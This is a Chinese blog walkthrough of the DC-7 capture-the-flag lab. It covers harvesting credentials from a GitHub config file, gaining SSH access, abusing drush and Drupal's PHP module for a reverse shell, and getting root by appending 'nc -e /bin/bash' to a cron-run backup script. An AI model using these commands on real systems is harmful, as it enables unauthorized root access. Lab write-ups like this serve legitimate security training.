DC-7通关详解

文章描述了一次通过弱口令尝试攻击web服务器的过程,包括利用特定工具搜索payload,发现并利用github上的配置文件获取账号密码,成功ssh登录后进行提权。在权限有限的情况下,通过研究drush管理drupal,启用php解析扩展创建反弹shell,并最终通过修改备份脚本实现root权限的shell生成。
摘要由CSDN通过智能技术生成

信息收集

在这里插入图片描述
在这里插入图片描述

漏洞发现

在这里插入图片描述
在这里插入图片描述
web提示我们说弱口令可能不会奏效

那么我们就先不考虑弱口令
searchsploit搜payload打打看,无果

看别人的wp知道了是通过web左下角的这个玩意去github搜
在这里插入图片描述在这里插入图片描述
在这个仓库用户唯一的仓库中看config.php
发现账号密码

在这里插入图片描述
尝试后台和ssh登录

ssh登录成功

提权

当前目录下发现mbox和backup文件夹
看看都是什么
backup目录下是俩挺大的压缩包
cat 一下mbox
在这里插入图片描述

然后看看/opt/scripts/backups.sh

在这里插入图片描述
没什么用,我们写不了该文件,但是发现www-data组可写
没思路了,也不能su过去,回头看一眼wp

发现/home/dc7user目录下还存在一个.drush目录,当时根本没在意,没怎么见过这东西
drush是个命令,可以管理drupal

cd到/var/www/html下
在这里插入图片描述

改admin的密码,用web弹个shell
和之前做的drupal的站一样,去扩展里找支持php解析的扩展,给他启用
发现这里没有,去下一个
https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
装完后启用,然后写一句话反弹shell
优化shell

python -c "import pty;pty.spawn('/bin/bash')"
ctrl+z
stty -echo raw;fg

现在有写的权限,在sh文件最后追加一个命令
等这个命令被root执行生成一个shell

echo "nc -e /bin/bash vps地址 9000" >> backups.sh

等15分钟,每15分钟执行一次,可以用date命令查看大概差多长时间
最好先自己手动执行看看能不能反弹上,省得再等15分钟
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值